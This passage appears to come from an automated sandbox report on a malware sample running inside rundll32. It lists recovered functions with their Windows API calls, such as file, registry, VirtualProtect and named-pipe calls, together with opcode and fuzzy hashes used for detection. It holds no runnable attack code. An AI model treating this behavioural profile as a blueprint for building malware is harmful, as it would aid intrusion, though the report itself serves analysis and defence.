                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05937D47 Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0593A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05937D5E), ref: 0593A6BE
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 05937D99
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,0593C556,?), ref: 05937DAB
                              • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,0593C556,?), ref: 05937DC3
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,0593C556,?), ref: 05937DDE
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleModuleNamePointerRead
                              • String ID:
                              • API String ID: 1352878660-0
                              • Opcode ID: 876dcff2fe8bde78ecbca75b82345e055550332f2fbbdcd0b384b0bbfc644958
                              • Instruction ID: 842df91caf1c8f1a5e2a4206470a6fad41b4a1f027bf67a7c0a466743f31944c
                              • Opcode Fuzzy Hash: 876dcff2fe8bde78ecbca75b82345e055550332f2fbbdcd0b384b0bbfc644958
                              • Instruction Fuzzy Hash: 711158B1A01228FBDF21ABA5DC8AEFFBE6DEF41694F104025F915E1050D7719A50CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05951C9B Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?,00000000,76CC8250,76C869A0,?,?,?,059366C0,?,00000000,?), ref: 05951CAB
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,059366C0,?,00000000,?), ref: 05951CCD
                              • lstrcpyW.KERNEL32(00000000,?), ref: 05951CF9
                              • lstrcatW.KERNEL32(00000000,?), ref: 05951D0C
                                • Part of subcall function 0593B83F: strstr.NTDLL ref: 0593B917
                                • Part of subcall function 0593B83F: strstr.NTDLL ref: 0593B96A
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                              • String ID:
                              • API String ID: 3712611166-0
                              • Opcode ID: 1e622f622f588293aa6f37d88c92cda7533453eba7dc63d19a6dc8f2dd67742c
                              • Instruction ID: d78a8942c43aa2d071e72ca2bbda5befef32acacea3f949e6822e6fbcce43dc5
                              • Opcode Fuzzy Hash: 1e622f622f588293aa6f37d88c92cda7533453eba7dc63d19a6dc8f2dd67742c
                              • Instruction Fuzzy Hash: 0A116772504519BFCB10AFA4CC8DEEEBFADFF092A5B014424F90596110EB34EE20DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593A253 Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,?), ref: 0593A28B
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • lstrcpy.KERNEL32(00000000,?), ref: 0593A2A2
                              • StrChrA.SHLWAPI(00000000,0000002E), ref: 0593A2AB
                              • GetModuleHandleA.KERNEL32(00000000), ref: 0593A2C9
                                • Part of subcall function 05938C35: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 05938D0D
                                • Part of subcall function 05938C35: VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,059560B0,0000001C,0594BE61), ref: 05938D28
                                • Part of subcall function 05938C35: RtlEnterCriticalSection.NTDLL(0595A400), ref: 05938D4D
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                              • String ID:
                              • API String ID: 105881616-0
                              • Opcode ID: 311830d2ca69e4fe8ff7e5b2b4f9326e58291a3b269408d38e52786d1b62d28d
                              • Instruction ID: a09754b56ec9093bd81c90775bb846126ed87ff49a5e053b099f28d2821999eb
                              • Opcode Fuzzy Hash: 311830d2ca69e4fe8ff7e5b2b4f9326e58291a3b269408d38e52786d1b62d28d
                              • Instruction Fuzzy Hash: 01214974A04309EFDB11DFA8C84ABAEBBF9FF84300F108059E4869B651DB74D981CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05951D47 Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05951D62
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 05951D86
                              • RegCloseKey.ADVAPI32(?), ref: 05951DDE
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000), ref: 05951DAF
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: QueryValue$AllocateCloseHeapOpen
                              • String ID:
                              • API String ID: 453107315-0
                              • Opcode ID: debf0b73a13959f4fa8cf69eb908179964aa19d50aa8056d066122746ad654f2
                              • Instruction ID: 3d2e18df1a323d19d2e622d745234e50dbc3533f60ffaadf3b9f0b34cbf7589e
                              • Opcode Fuzzy Hash: debf0b73a13959f4fa8cf69eb908179964aa19d50aa8056d066122746ad654f2
                              • Instruction Fuzzy Hash: 4121C4B590050CFFDF11DF99C884EEEBBBDFB88250F208456F842A6210E7719A60EB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593263B Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0594EAA8,00000000,?,00000000,0593E842,00000000,05F3C310), ref: 05932646
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0593265E
                              • memcpy.NTDLL(00000000,?,-00000008,?,?,?,0594EAA8,00000000,?,00000000,0593E842,00000000,05F3C310), ref: 059326A2
                              • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 059326C3
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memcpy$AllocateHeaplstrlen
                              • String ID:
                              • API String ID: 1819133394-0
                              • Opcode ID: 2f8ad249ba70b7547b2ed54ba6a207f314f0ef7e2a12aaae762e7bd2361f7c76
                              • Instruction ID: 0a7374eb7ef0e6f0881439b4f2a58a02b7479d93a42f25d6220e769ed1ab5f8f
                              • Opcode Fuzzy Hash: 2f8ad249ba70b7547b2ed54ba6a207f314f0ef7e2a12aaae762e7bd2361f7c76
                              • Instruction Fuzzy Hash: D0112976A00214EFC7108F69EC8AD9EBFEEEFC1261B050276F409D7141EB709E1487A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059421FE Relevance: 6.1, APIs: 4, Instructions: 58threadCOMMON
                              Download Yara Rule
                              APIs
                              • GlobalFix.KERNEL32(00000000), ref: 0594223E
                              • memset.NTDLL ref: 05942252
                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 0594225F
                                • Part of subcall function 0594C563: OpenProcess.KERNEL32(00000410,B8F475FF,05942289,00000000,00000000,05942289,0000001C,00000000,00000000,?,?,?,05942289), ref: 0594C5BD
                                • Part of subcall function 0594C563: CloseHandle.KERNEL32(00000000,00000000,00000000,05942299,00000104,?,?,?,05942289), ref: 0594C5DB
                                • Part of subcall function 0594C563: GetSystemTimeAsFileTime.KERNEL32(05942289), ref: 0594C643
                              • GlobalUnWire.KERNEL32(00000000), ref: 0594228A
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
                              • String ID:
                              • API String ID: 3286078456-0
                              • Opcode ID: 4d7084d8624fe74423fd27d75b4603d69e5d01ee2de0425e1dd5177393becc34
                              • Instruction ID: d07d966392cbea683b6348c16e3f0cb9f2f5ce7332283d913f37a135d0eb6a49
                              • Opcode Fuzzy Hash: 4d7084d8624fe74423fd27d75b4603d69e5d01ee2de0425e1dd5177393becc34
                              • Instruction Fuzzy Hash: CB113375A08305EBEB11ABB5D849BAEBFBCBB48601F044116F906E6240EF74C911CF65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05951C1F Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                              Download Yara Rule
                              APIs
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,0593AE46,00000000,00000000), ref: 05951C3D
                              • GetLastError.KERNEL32(?,?,?,0593AE46,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,0593EBC1,?,0000001E), ref: 05951C45
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharErrorLastMultiWide
                              • String ID:
                              • API String ID: 203985260-0
                              • Opcode ID: 473bb17b2aa1f0edddf1a2d8bc036d4a44b4a248029972807cdfa53f6285110a
                              • Instruction ID: 90dd1995ea5f981badb66cef4c0f0682a3a63fcf4fcc437841d6017c63a30197
                              • Opcode Fuzzy Hash: 473bb17b2aa1f0edddf1a2d8bc036d4a44b4a248029972807cdfa53f6285110a
                              • Instruction Fuzzy Hash: 740171761083517F8721EA76DC4CE6BBF6DEBC6B70B110A19F8A592280DB21A814D771
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059327E0 Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,?,?,00000000,?,?,05931D09,?,?,?,?,?,?,?,?,?), ref: 059327F4
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • mbstowcs.NTDLL ref: 0593280E
                              • lstrlen.KERNEL32(?), ref: 05932819
                              • mbstowcs.NTDLL ref: 05932833
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0594BB1D
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0594BB29
                                • Part of subcall function 0594BAD1: memset.NTDLL ref: 0594BB71
                                • Part of subcall function 0594BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0594BB8C
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(0000002C), ref: 0594BBC4
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?), ref: 0594BBCC
                                • Part of subcall function 0594BAD1: memset.NTDLL ref: 0594BBEF
                                • Part of subcall function 0594BAD1: wcscpy.NTDLL ref: 0594BC01
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                              • String ID:
                              • API String ID: 1961997177-0
                              • Opcode ID: e84fc5da514601db6a1eecfda94bff13418fb3bdf393c000fa54f96946194d7b
                              • Instruction ID: afd81112d50aa88be8eceb34b26cc2fa1befde793295f1807ada10d58e4d38fb
                              • Opcode Fuzzy Hash: e84fc5da514601db6a1eecfda94bff13418fb3bdf393c000fa54f96946194d7b
                              • Instruction Fuzzy Hash: B801B573A00204B7DF11ABA58C8DF9F7BADEFC4750F144425F50596200EA79ED108BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594E03B Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,05940D10,?,00000000,00000000), ref: 0594E04E
                              • lstrlen.KERNEL32(05F3C178,?,05940D10,?,00000000,00000000), ref: 0594E06F
                              • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 0594E087
                              • lstrcpy.KERNEL32(00000000,05F3C178), ref: 0594E099
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                              • String ID:
                              • API String ID: 1929783139-0
                              • Opcode ID: 5d71775003ba443d47f6cca12c18657e935bfdebddbffa2bf8fba7c341241563
                              • Instruction ID: 848907a12f0ca5bdc2fe97d7b891df409ca3ea4a8824f95f0079848df9862f46
                              • Opcode Fuzzy Hash: 5d71775003ba443d47f6cca12c18657e935bfdebddbffa2bf8fba7c341241563
                              • Instruction Fuzzy Hash: 5A01C876908344EFC7119BB8A849E6FBFBCBB49201F054165F95AD3241DB3099148FA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05931B71 Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?), ref: 05931B7E
                              • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 05931BA4
                              • lstrcpy.KERNEL32(00000014,?), ref: 05931BC9
                              • memcpy.NTDLL(?,?,?), ref: 05931BD6
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeaplstrcpylstrlenmemcpy
                              • String ID:
                              • API String ID: 1388643974-0
                              • Opcode ID: 4e464f7a5ba375ed7e5b8c0e1f027ffc6716b02df9cc8b92416eaa8d09be0ae5
                              • Instruction ID: 1113a27df9e89bd663a94cbabc399e2b1dbbf12d229cff18bfb38da3b4d10d5f
                              • Opcode Fuzzy Hash: 4e464f7a5ba375ed7e5b8c0e1f027ffc6716b02df9cc8b92416eaa8d09be0ae5
                              • Instruction Fuzzy Hash: 9711887190430AEFCB20CF18D885E9ABBF8FF48304F00842AF84A87221D730E914DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05949E10 Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,765BD3B0,?,76C85520,0593B697,00000000,?,?,?,76CDF710,00000000,00000000), ref: 05949E17
                              • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 05949E2F
                              • memcpy.NTDLL(0000000C,?,00000001), ref: 05949E45
                                • Part of subcall function 0593A8E9: StrChrA.SHLWAPI(00000020,?,765BD3B0,05F3C304,00000000,?,05936584,?), ref: 0593A90E
                                • Part of subcall function 0593A8E9: StrTrimA.SHLWAPI(00000020,05955FCC,00000000,?,05936584,?), ref: 0593A92D
                                • Part of subcall function 0593A8E9: StrChrA.SHLWAPI(00000020,?,?,05936584,?), ref: 0593A939
                              • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 05949E77
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                              • String ID:
                              • API String ID: 3208927540-0
                              • Opcode ID: 87c836a999fcad54f8b45d863ea30f1817ec79e80ccd8151e2481cd368e9f1ad
                              • Instruction ID: 7ae3e229831fca8502eac6f951a0aa0e0cbee60596f9f56165b8ec711762945a
                              • Opcode Fuzzy Hash: 87c836a999fcad54f8b45d863ea30f1817ec79e80ccd8151e2481cd368e9f1ad
                              • Instruction Fuzzy Hash: EF01A731618701EBD3219E61EC4AF2BBFADFBC1B51F048525F64996080DB709C199B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05945261 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • RtlInitializeCriticalSection.NTDLL(0595A400), ref: 05945285
                              • RtlInitializeCriticalSection.NTDLL(0595A3E0), ref: 0594529B
                              • GetVersion.KERNEL32(?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059452AC
                              • GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059452E0
                                • Part of subcall function 059468AC: GetModuleHandleA.KERNEL32(?,00000001,773D9EB0,00000000,?,?,?,?,00000000,059452C3), ref: 059468C4
                                • Part of subcall function 059468AC: LoadLibraryA.KERNEL32(?), ref: 05946965
                                • Part of subcall function 059468AC: FreeLibrary.KERNEL32(00000000), ref: 05946970
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                              • String ID:
                              • API String ID: 1711133254-0
                              • Opcode ID: c97309228569946f0cc88869278bee24aa5f38c641da144eb8d4122bf3ccb379
                              • Instruction ID: 02d0937515a381e58cbb9ef623dab2a2d31d6b331df0ae3f90247cb6d27be4ea
                              • Opcode Fuzzy Hash: c97309228569946f0cc88869278bee24aa5f38c641da144eb8d4122bf3ccb379
                              • Instruction Fuzzy Hash: BD11C471A783019BD700DFB9E98AA15BFE4F785326741072AF605C7200DFB858A08F48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05932530 Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON
                              Download Yara Rule
                              APIs
                              • RtlEnterCriticalSection.NTDLL(0595A428), ref: 0593253B
                              • Sleep.KERNEL32(0000000A), ref: 05932545
                              • SetEvent.KERNEL32 ref: 0593259C
                              • RtlLeaveCriticalSection.NTDLL(0595A428), ref: 059325BB
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSection$EnterEventLeaveSleep
                              • String ID:
                              • API String ID: 1925615494-0
                              • Opcode ID: 48ce848347c3f5f533435e5c28f2c16d0c0f042adb772e5dde16388553895e12
                              • Instruction ID: f64d3875d9bfa76f079f26a174432cda3a2c9f069c91ca4f6f137ab388d45759
                              • Opcode Fuzzy Hash: 48ce848347c3f5f533435e5c28f2c16d0c0f042adb772e5dde16388553895e12
                              • Instruction Fuzzy Hash: 68019270658304EBEB009BA4DC4BF6ABFADFB04712F408011F70AD6091DB749A24CBA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05937BD8 Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05950DDD: lstrlen.KERNEL32(?,?,00000000,05937BEE), ref: 05950DE2
                                • Part of subcall function 05950DDD: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 05950DF7
                                • Part of subcall function 05950DDD: wsprintfA.USER32 ref: 05950E13
                                • Part of subcall function 05950DDD: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 05950E2F
                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 05937C06
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 05937C15
                              • CloseHandle.KERNEL32(00000000), ref: 05937C1F
                              • GetLastError.KERNEL32 ref: 05937C27
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                              • String ID:
                              • API String ID: 4042893638-0
                              • Opcode ID: 65193016ed6b4a01cdc519909969e1f27e62458c258c16cd02019650eef0d97b
                              • Instruction ID: f318bfbe41088da2e8bdc9487e6a98254c4bebbd161ef0c4200bfafeba58fa1e
                              • Opcode Fuzzy Hash: 65193016ed6b4a01cdc519909969e1f27e62458c258c16cd02019650eef0d97b
                              • Instruction Fuzzy Hash: 07F0D1B1208314BAD7216FB5EC8EF9FBE6DFF457B1F104515F90AA1190CA30565087E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059388FA Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • InterlockedExchange.KERNEL32(0595A060,00000000), ref: 05938906
                              • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 05938921
                              • lstrcpy.KERNEL32(00000000,?), ref: 0593894A
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0593896B
                                • Part of subcall function 0593DC41: SetEvent.KERNEL32(00000000,?,0594507B), ref: 0593DC56
                                • Part of subcall function 0593DC41: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0594507B), ref: 0593DC76
                                • Part of subcall function 0593DC41: CloseHandle.KERNEL32(00000000,?,0594507B), ref: 0593DC7F
                                • Part of subcall function 0593DC41: CloseHandle.KERNEL32(00000000,?,?,0594507B), ref: 0593DC89
                                • Part of subcall function 0593DC41: RtlEnterCriticalSection.NTDLL(?), ref: 0593DC91
                                • Part of subcall function 0593DC41: RtlLeaveCriticalSection.NTDLL(?), ref: 0593DCA9
                                • Part of subcall function 0593DC41: CloseHandle.KERNEL32(00000000), ref: 0593DCC5
                                • Part of subcall function 0593DC41: LocalFree.KERNEL32(?), ref: 0593DCD0
                                • Part of subcall function 0593DC41: RtlDeleteCriticalSection.NTDLL(?), ref: 0593DCDA
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                              • String ID:
                              • API String ID: 1103286547-0
                              • Opcode ID: dcf01ff048d5abbe11eddf2724ba11b429503420891d866bc7b28f01cd4ef0d1
                              • Instruction ID: a3c1ba4d71fe601d9fdc80ece7164c23a1f35020da00503e8a9c94af65621d04
                              • Opcode Fuzzy Hash: dcf01ff048d5abbe11eddf2724ba11b429503420891d866bc7b28f01cd4ef0d1
                              • Instruction Fuzzy Hash: 47F0C231769311BBDB315B31AC0FF4B7F28EB85B62F010110BA0A9B180DF649829C7A4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05944A4B Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcatW.KERNEL32(?,?), ref: 05944A5D
                                • Part of subcall function 0593F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0593F3DB
                                • Part of subcall function 0593F39B: GetLastError.KERNEL32 ref: 0593F3E5
                                • Part of subcall function 0593F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0593F40A
                                • Part of subcall function 0593F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0593F42D
                                • Part of subcall function 0593F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0593F455
                                • Part of subcall function 0593F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0593F46A
                                • Part of subcall function 0593F39B: SetEndOfFile.KERNEL32(00001000), ref: 0593F477
                                • Part of subcall function 0593F39B: CloseHandle.KERNEL32(00001000), ref: 0593F48F
                              • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,0593E4AF,?,?,00001000,?,?,00001000), ref: 05944A80
                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,0593E4AF,?,?,00001000,?,?,00001000), ref: 05944AA2
                              • GetLastError.KERNEL32(?,0593E4AF,?,?,00001000,?,?,00001000), ref: 05944AB6
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                              • String ID:
                              • API String ID: 3370347312-0
                              • Opcode ID: 7e271e93d5d0e59d56caf5a5ab4fe4b1721d25fbceef65c3e18363d697b690b3
                              • Instruction ID: ebbb2c48738e0a3d13f00fc9dabc811832d789a87c5e7640fb0f00dfc8fbc898
                              • Opcode Fuzzy Hash: 7e271e93d5d0e59d56caf5a5ab4fe4b1721d25fbceef65c3e18363d697b690b3
                              • Instruction Fuzzy Hash: A9F0AF31248304FBEF119E60AC0AF6A7F2ABF05310F100500FB0A981D0EB71A930CBA9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594D5F3 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 0594D601
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0593DB8C,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0594D616
                              • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,05933EC6,?,?), ref: 0594D623
                              • CloseHandle.KERNEL32(?,?,?,?,05933EC6,?,?), ref: 0594D635
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateEvent$CloseHandlememset
                              • String ID:
                              • API String ID: 2812548120-0
                              • Opcode ID: a06957430973cb1eed7954224c63b9754b90c01b7caac2f5d13c41683afa5540
                              • Instruction ID: 224f689b8d6ab14f7e1a97c5d6e42b41f3a86c8171dddcc42611df83fad26759
                              • Opcode Fuzzy Hash: a06957430973cb1eed7954224c63b9754b90c01b7caac2f5d13c41683afa5540
                              • Instruction Fuzzy Hash: E7F0FEB510830C7FD3206F66DCC4C27FBACFF96298B12892EF14682511DA71AC158F60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05944AC4 Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,05934BD6,000000FF,05F3B7F0,?,?,0594B7F2,0000003A,05F3B7F0), ref: 05944AE0
                              • GetLastError.KERNEL32(?,?,0594B7F2,0000003A,05F3B7F0,?,0594A2EB,00000001,?,00000000,00000000,00000000,?,0593109E,05959F2C,00000008), ref: 05944AEB
                              • WaitNamedPipeA.KERNEL32(00002710), ref: 05944B0D
